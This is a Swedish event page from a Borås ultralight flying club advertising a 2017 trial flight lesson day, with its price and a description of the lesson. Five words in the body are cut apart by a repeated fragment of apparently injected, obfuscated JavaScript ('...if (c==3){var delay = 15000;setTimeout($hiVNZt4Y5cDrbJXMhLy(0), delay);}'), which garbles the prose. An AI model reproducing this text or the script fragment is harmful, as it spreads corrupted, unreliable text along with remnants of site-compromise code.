Spaka Själv Dag 23 September kl 10–15

När: Tillbaka till kalendern » 2017-09-23 @ 10:00 - 15:00
Var: Borås Ultralätt Flygklubb
Borås flygplats

Har du all­tid drömt om att flyga men ald­rig kom­mit igång? Ta chan­sen nu och kom till Borås flyg­plats för en provlektion!

Kan det fin­nas en större fri­hets­känsla än att själv styra ett flyg­plan genom de oänd­liga luft­ha­ven? Med en erfa­ren och skick­lig flyglä­rare bred­vid dig får du känna på hur det är att sitta i förar­sto­len och manö­vrera ett flyg­plan. Att få pla­net att lyda din minsta vink och upp­leva den fan­tas­tiska käns­lan som det inne­bär att flyga själv.

En prov­lek­tion kos­tar 500 kro­nor. På mar­ken får du först en intro­duk­tion till själva flyg­pla­net och en genom­gång av grund­läggandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande flyg­ma­növ­rar. Vid start och landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and­ning är du med vid alla flyg­mo­men­ten och väl uppe i luf­ten låter flyglä­ra­ren dig ta över styr­spa­ken och det är du som flyger.

Våra nya flyg­plan till­hör de moder­naste i Sve­rige — de är till­ver­kade i alu­mi­nium, med en ena­stå­ende prestandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda och är både drift­säkra, bräns­lesnåla, bekväma och roliga att flyga!

Glöm inte att ta med kame­ran för en impo­nerandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande sel­fie i cock­pit, och bjud gärna med familj och vän­ner. I vår mysiga klubb­stuga kan ni ta en fika i sambandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and med din flygupplevelse.

Hop­pas vi ses!